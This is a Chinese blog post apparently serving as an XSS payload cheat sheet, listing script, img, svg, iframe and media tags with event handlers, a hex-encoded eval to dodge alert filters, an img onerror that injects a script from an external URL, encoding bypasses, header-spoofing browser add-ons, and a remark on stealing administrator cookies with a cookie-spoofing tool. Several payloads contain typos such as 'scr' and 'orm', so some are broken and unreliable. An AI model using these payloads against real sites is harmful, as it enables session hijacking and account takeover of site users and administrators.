美文网首页
03.(4)XSS常见标签

03.(4)XSS常见标签

作者: 新一mghc | 来源:发表于2019-03-19 16:34 被阅读0次

xss 就是在页面执行你想要的 js

IP ,Referer ,User-Agent, Cookie 等都可以修改。

服务器端经常使用document.boby.innerHtml 等函数动态生成 html 页面

一、常用函数、构造语句

1.常用函数

onclick 鼠标点击触发
onmousemove 当鼠标移动就触发
onload 当页面加载完成后触发傻

2.常用构造语句

<script scr="js_url"></script> 

<a href=javascrip:alert('xss')>s</a>  
//点 击 s时 运 行 alert('xss')

<iframesrc="javascript:alert(2)">
//若存在 X-frame 选项, Payload 失效。

<img  scr=1  onerror=alert('xss')> 
//当 找 不 到图 片 名 为 1 的 文 件 时, 执 行 alert('xss')
<video src=test.mp4 onerror=alert(‘1’);>//视频
<audio src=test.mp3 onerror=alert(‘1’);>//音乐

<orm action="Javascript:alert(1)"><input type=submit><isindex action="javascript:alert(1)" type=image>


<svg/onload=prompt(1);>
//SVG 是使用 XML 来描述二维图形和绘图程序的语言。
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)> 
// autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。
<textarea autofocus onfocus=alert(1)>
<video><source>
//这里也可以通过各种变形绕过 WAF



<img src=x onerror=appendChild(createElement('script')).src='js_url'  /> 

<iframe  src=javascript:alert('xss');height=0  width=0  /><iframe>
//利  用 iframe 的 scr 来  弹  窗 

<img  src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> 
//过滤了alert 来执行弹窗等等有很多的方法,

<svg onload=confirm``>

3.绕过方式

(1).编码绕过

Javascript 可以使用多种编码方式,如 16 进制、Unicode、HTML 等进行编码。
支持编码属性:
href=
action=
name=
background=
src=
data=

二、常用工具

1. win工具

Sky、Safe3WVS、Netsparker 等都可以挖掘出反射 XSS

2.firefox 浏览器和两个附件

  1. X-Forwarded-For Header
    因为PHP获取IP有3个函数。而X-Forwarded-For Header就是对其中一个函数X_FORWARDED_FOR起作用,X_FORWARDED_FOR 有个缺陷可以使客户端伪造任意 IP,当然包括字符串,但是对其他两个函数就不行了。
  2. Modify HeadersModify Headers
    可以伪造数据包内容,当然也可以伪造 HTTP_CLIENT_IP 来更改 IP。

3. 后续攻击工具

管理员的 cookies 和后台地址还有管理员浏览器版本等等你都可以获取到
桂林老兵 cookie 欺骗工具

优先级标签
<textarea> 标签

相关文章

  • 03.(4)XSS常见标签

    xss 就是在页面执行你想要的 js IP ,Referer ,User-Agent, Cookie 等都可以修改...

  • 通用型漏洞-- xss大全

    (1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签...

  • xcc注入

    1.将特殊标签转义 防止XSS注入:将xss code ----- string render如:

  • web安全测试常见问题汇总

    常见问题: 1.XSS(CrossSite Script)跨站脚本*** XSS(CrossSite Script...

  • 常见前端安全性问题

    1.跨站脚本攻击(XSS攻击) XSS(Cross Site Scripting),跨站脚本攻击。XSS是常见的W...

  • PHP面试(三)

    XSS攻击是什么 常见的 XSS 输入XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框: ale...

  • 03.(6)XSS SHOW

    今天就来讲一下大家都熟悉的 xss 漏洞的攻击利用。相信大家对 xss 已经很熟悉了,但是很多安全人员的意识里 ...

  • HTML5安全

    HTML5新标签新标签的XSS 和 HTML5种新增的一些标签和属性,使得XSS等Web攻击产生了新的变化,为了总...

  • XSS常见Paylaod

    XSS常见Payload总结 XSS漏洞的存在与发生伴随两个概念: 输入函数和输出函数。XSS攻击Payload...

  • SVG标签-XSS

    http://115.com/1000018516/T1231785.html

网友评论

      本文标题:03.(4)XSS常见标签

      本文链接:https://www.haomeiwen.com/subject/nhqhmqtx.html